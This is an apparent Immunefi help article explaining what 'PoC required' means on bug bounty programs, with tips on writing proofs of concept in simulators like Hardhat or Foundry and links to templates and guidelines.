“PoC required” appears on most, if not all bug bounty program pages, in the “Rewards by Threat Level” section near the top. However, on some programs a PoC is only required for critical or high severity finds.
PoC stands for Proof-of-Concept, and is defined as “runnable code that a bug/vulnerability and impact are real without actually exploiting the vulnerability in a live environment”. This is important for the impact and feasibility of a vulnerability to be assessed without affecting the actual protocol.
In general, here are the things to take note:
- Writing a PoC for a vulnerability would require some amount of coding, as well as setting up a blockchain simulator environment such as HardHat or Foundry to run it.
- Screenshots of code are not acceptable as PoCs.
- PoCs can be written in any framework or language so long as it can sufficiently demonstrate the vulnerability.
If you’ve never written a PoC before… Don’t panic!
Many whitehats have found themselves in your shoes in the past. Some of them are now elites who have earned 5-7 figure bounties, after learning how to write a valid PoC. In case it’s not clear enough, learning to write a PoC is not optional— and it is almost guaranteed to boost your chances of success as a whitehat on Immunefi.
Here are some additional resources to help you write your PoC:
- How to PoC your Bug Leads — https://medium.com/immunefi/how-to-poc-your-bug-leads-5ec76abdc1d8
- Immunefi PoC Templates — https://medium.com/immunefi/immunefi-poc-templates-4345f098ac69
Proof of Concept (PoC) Guidelines and Rules — https://immunefisupport.zendesk.com/hc/en-us/articles/9946217628561-Proof-of-Concept-PoC-Guidelines-and-Rules